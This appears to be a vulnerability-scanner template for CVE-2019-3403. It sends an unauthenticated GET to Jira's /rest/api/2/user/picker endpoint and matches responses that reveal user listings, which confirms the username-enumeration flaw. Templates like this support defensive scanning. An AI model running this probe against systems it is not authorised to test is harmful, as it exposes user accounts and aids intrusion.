CVE-2019-3403.yaml
id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69242
  tags: cve,cve2019,atlassian,jira
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2019-3403
    cwe-id: CWE-863

requests:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'application/json'
        part: header

      - type: word
        words:
          - users
          - total
          - header
        condition: and